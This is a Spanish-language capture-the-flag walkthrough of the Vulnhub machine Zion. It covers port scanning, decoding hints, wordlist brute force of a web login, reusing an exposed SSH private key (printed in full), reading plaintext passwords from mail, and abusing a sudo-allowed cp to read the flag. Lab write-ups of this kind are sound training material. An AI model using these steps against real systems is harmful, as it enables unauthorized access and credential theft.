[VLN] Zion

Hoy vamos a hackear la maquina de Vulnhub llamada Zion. Podeis descargarla desde el siguiente enlace: Zion

Video


Enumeration


Empezamos con un nmap para ver que puertos tiene abiertos.

sml@Cassandra:~$ nmap -A -p- 192.168.1.78
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-07 13:01 CEST
Nmap scan report for 192.168.1.78
Host is up (0.00096s latency).
Not shown: 65533 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey: 
|_  2048 92:4b:37:54:79:d2:a8:e2:b1:90:f6:f0:95:73:75:14 (RSA)
80/tcp open  http    Apache httpd (PHP 7.4.5)
|_http-server-header: Apache
|_http-title: 403 Forbidden

Service detection performed. Please report any incorrect results at 
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 126.58 seconds
Al meternos en la web, si elegimos el boton "Truth", en la respuestas nos aparece lo siguiente:

Matrix-Banner: 
RGVjcnlwdCB0aGUgbWVzc2FnZSB0aGF0IFppb24gbGVmdCBmb3IgeW91LiAnT3BlbiB5b3VyIG1pbmQn
IGFuZCByZW1lbWJlciB0byBiYXNlIGl0IG9uIG5vdCB1c2luZyBhbnkgb2YgdGhlIGNoYXJhY3RlcnMg
JycrIiwgIi0iLCAiLyIgYW5kICI9Ii4=

Matrix-Message: 
7FIdtgEWjK69TYIYCpDwyx9ucnDDusp2s8nGAw9ChJ5b9SCT4MmBdI38X5DPerIEQS9zdQauLhJsN9SL
YWhmNJ128htAUKBx5pf9SCXQq308ZN8sMtah0No4z2mrKlIJwMsO8gILIzme4Pb8xuB9sUtqxI9XWWl9
z1Cqv9y8bs3o47BC3msuzdAcBAB8hzbVO04Wqu8xhLe77IVcr9OEJEMCCgO89J4YJ0R7MO88gIJQOVkX
9t8XANRXyCWjw8xmUdF1pGK3bHyFgqQo
El Matrix-Banner es base64 con lo cual hacemos el decode para ver que indica.

sml@Cassandra:~$ echo 
"RGVjcnlwdCB0aGUgbWVzc2FnZSB0aGF0IFppb24gbGVmdCBmb3IgeW91LiAnT3BlbiB5b3VyIG1pbmQ
nIGFuZCByZW1lbWJlciB0byBiYXNlIGl0IG9uIG5vdCB1c2luZyBhbnkgb2YgdGhlIGNoYXJhY3RlcnM
gJycrIiwgIi0iLCAiLyIgYW5kICI9Ii4" | base64 -d
El mensaje es el siguiente:

Decrypt the message that Zion left for you. 'Open your mind' and remember to 
base it on not using any of the characters ''+", "-", "/" and "=".
Con esa pista, habla de base62, asi que cogemos el "Matrix-Message" y hacemos el decode de base62: http://decode-base62.nichabi.com/ Al hacer el decode obtenemos:

The username/password information for accessing the "Zion's System" is on the 
page where you made your choice. 
To make it easier, the user "morpheus.thematrix" likes the simplicity of his 
passwords.
Sabiendo esto preparamos un diccionario con todas las palabras que aparecen en la web, y las pasamos a minusculas, ya que es "lo mas simple".

sml@Cassandra:~$ cewl http://192.168.1.23 > dict1.txt
sml@Cassandra:~$ cat dict.txt | tr '[:upper:]' '[:lower:]' > dict2.txt
Ahora que tenemos el diccionario (dict2.txt) arrancamos burp, y hacemos bruteforce. Despues del "bruteforce" vemos que la password es: interpreted. Nos logueamos en la web y habla del usuario w.rabbit. Vamos a private key...y podemos ver una key RSA a la que le falta la tipica "linea" inicial y final, asi que las agregamos, y pegamos en medio la private key. Quedaria asi:

-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEA4WNRk13m7zHx9Ygsnf3iHC2x8WuTkb0n3WbxrrlyfHBXBTPSbwNn
dpW5BWPHQN05Uj+Y6SWHJqdSv8QdPhxkYSHVdqoBcA/lXrkjzSpa4eKoXyJCsXk3ZUY4z/
YLY1r/lP9glpLZQ5A4T8jbz11fJ4XmhGNB5gCeuYmi7GO6jaElIHSX+bXX8iON1GjGnl+M
DrUSEu1bLlkVoZ0RDZE8qLpyQHyzeNBD1Pwr9wd/X20+5Aop/H13NRH7F+qb41oyC2QxyL
wQda63utkVm05kd9klYh5TVXAkzwLF5v2YMlsur7c4LmS/afhAeMIZyw5DvfADjTmNC31Q
4RVURrY3WnlyVC/ijmCMFKHHO53ld8E3fQe82XaXitwl1bKOiAGTAPTguG7Jgkfrjhmh0W
qw/Jcyz4H9A+hVQ8KCz7IdM8E0l/O23JMWvlaC3j/gfQuInDF/w8xmOX/pNVzoiwsmxy4c
OdSWtdXRrEJU3wcUB07cbioWtQrjWnnfzDFMSYyBAAAFiCoCcSQqAnEkAAAAB3NzaC1yc2
EAAAGBAOFjUZNd5u8x8fWILJ394hwtsfFrk5G9J91m8a65cnxwVwUz0m8DZ3aVuQVjx0Dd
OVI/mOklhyanUr/EHT4cZGEh1XaqAXAP5V65I80qWuHiqF8iQrF5N2VGOM/2C2Na/5T/YJ
aS2UOQOE/I289dXyeF5oRjQeYAnrmJouxjuo2hJSB0l/m11/IjjdRoxp5fjA61EhLtWy5Z
FaGdEQ2RPKi6ckB8s3jQQ9T8K/cHf19tPuQKKfx9dzUR+xfqm+NaMgtkMci8EHWut7rZFZ
tOZHfZJWIeU1VwJM8Cxeb9mDJbLq+3OC5kv2n4QHjCGcsOQ73wA405jQt9UOEVVEa2N1p5
clQv4o5gjBShxzud5XfBN30HvNl2l4rcJdWyjogBkwD04LhuyYJH644ZodFqsPyXMs+B/Q          
PoVUPCgs+yHTPBNJfzttyTFr5Wgt4/4H0LiJwxf8PMZjl/6TVc6IsLJscuHDnUlrXV0axC                                                                  
VN8HFAdO3G4qFrUK41p538wxTEmMgQAAAAMBAAEAAAGAfKZmFj9nmcAgle9S5ankpDrtX5          
xkR8S6SGtHnJ85XvLuXZU0e2sBjIbvhbiSGSCANCmyErdLkKgXTrFSjug657FDklYhZ22T          
KBjyYORc0PJ+teaHxglJBryYbQMhdzh7g1bdf0kF2aToT8/BKWT1XDFktLEEYATVw70IGv          
5ozS1jEBkLd/IG1QauyNuNhUdIeVXRAiC9PdvM582rAbriNlqvF1UgGN/ts9wnIH7IBemw          
T4QDhn2JMROZr7dzsYBOhP4yZ16vPKevxO5rXJBUGU2+BM0ZYLs20ygXnr6KM/powHCkSF          
vmCja9vbZfaTKFPS20OFbLy2xbbw7Syjc4beXbV/Qvok4EVTx1lvdZ4EdKYJQMoj7X3vuK          
brmpFe2SHieSOAgeE/lrV+UmOElPCFq4867AXMGz9tgUznLkhSvGL2DqhFoqM75zc5wv4u          
RZ/BiNIpY+yOeTk5tfzR66G92F2qWClgwLjk48oDBPcvxdMoXnNQXONf2x78cxthvxAAAA           
wClThtKaLnmdLGwDpaWdgoZEgD3DU2xFY/sxJefYagBdkMRzUCxoResMyJOk95K9oh35kJ            
06Jd2kt05rMGn8eSjlA3i78mI0/QqOlfRpfhEUz/ZNCYGxWYKNRqNtrfoLKTDQraA2xhAd            
p34+NBGgc8vEehv4l8W31OzFt+O9Nf+GARikR8AYIPcVzu2hjRwONkSSNkvoWH0rl8BBjn
vapJp+xMW68mnwi/RM/u/5OHNcqENRpF3N0+JVnzr6N9c/rQAAAMEA/d+HPzbk4UPLiUKq
fje1lhZfCji7etC+Dh2Jj0l1CgL9oVLz/Qt7+N2zB9evJ44ZLdQtXPas8HJlDHn0UjoUat
DW0ENrqFJ9gq+J2j3hDZt2EmQiU8XAkhX1shmk/8fG40pdYF3r1qy+bcjZ4xZWN6VSkqvI
4/l8hhmR82h6pT+Rd4m9F209HvMbP2wQNsB8plez18uNsDkTOw+HVABLlgFQQUmQChIgRq
lG42KN5zGQkFyF0JrFREHFJBBnEG7tAAAAwQDjRrMEEggCA/RgGnsrBOTKJKUkqSOrCrTN
+EBBtU2Yg/L3UF1bvzHIjYSaHRYBWQivAoxUeSzWRMv69RrUKEPtQyGLg0Gawh4dM+KKIR
YuSXnMWKC+IND/Z0k7bzae/9veUBFyu8pv4Kc3PRwOSTpfnsGA5CjtHSsFfaH71yLe2n6u
I+k4MWTtetE/b72ptCyGXvf3Tv0dW6BE4ZvkKwFtXmx2lJvlHnLkvb2U048tnPzhlov6G3
ceLgv/YmiizWUAAAATdy5yYWJiaXRAemlvbnNlcnZlcg==
-----END OPENSSH PRIVATE KEY-----
Lo guardamos como rabbit.key y le damos los permisos correspondientes:

sml@Cassandra:~ $ chmod 600 rabbit.key
Probamos a conectarnos usando esta key, y el usuario w.rabbit.

Low shell



sml@Cassandra:~$ ssh -i rabbit.key w.rabbit@192.168.1.23
[w.rabbit@zionserver ~]$ cat warning.txt 
Congratulations on making it this far.
The goal is to read the /home/dozer/flag.txt file.
Use the method and techniques you prefer.
Inspeccionamos el sistema y vemos que /var/mail/w.rabbit contiene datos que nos interesan :)

[w.rabbit@zionserver bin]$ cat /var/mail/w.rabbit
Remember to write down the new password before I forget it.
OLDPASS: Admin129
NEWPASS: P@s5w0rd#2020
Sabiendo la password, miramos si podemos usar sudo...

flag.txt (dozer)



w.rabbit@zionserver mail]$ sudo -l
[sudo] password for w.rabbit: 
User w.rabbit may run the following commands on zionserver:
    (dozer) /bin/cp
Podemos usar cp, y lo que necesitamos es leer /home/dozer/flag.txt... asi que:

[w.rabbit@zionserver ~]$ /bin/sudo -u dozer /bin/cp 
--no-preserve=mode,ownership /home/dozer/flag.txt /tmp/fuckingflag.txt
[sudo] password for w.rabbit: 
[w.rabbit@zionserver ~]$ cat /tmp/fuckingflag.txt 
__        __   _
\ \      / /__| | ___ ___  _ __ ___   ___
 \ \ /\ / / _ \ |/ __/ _ \| '_ ` _ \ / _ \
  \ V  V /  __/ | (_| (_) | | | | | |  __/
   \_/\_/ \___|_|\___\___/|_| |_| |_|\___|

 _____   _____ _          ______
|_   _|_|_   _| |__   ___|__  (_) ___  _ __
  | |/ _ \| | | '_ \ / _ \ / /| |/ _ \| '_ \
  | | (_) | | | | | |  __// /_| | (_) | | | |
  |_|\___/|_| |_| |_|\___/____|_|\___/|_| |_|

----------------------------------------------
Congratulations!!

Hope you enjoyed Zion:1. Just wanted to send a big thanks out there
to all those who have privied feedback, and who have taken time to
complete these little challenges. 

If you enjoyed this CTF, send me a tweet via @mrhenrike

So, take your award:

flag = challUG{Th1nk_0u7_0f_th3_60x}

End


Y con esto ya tendriamos el flag del "dozer" :)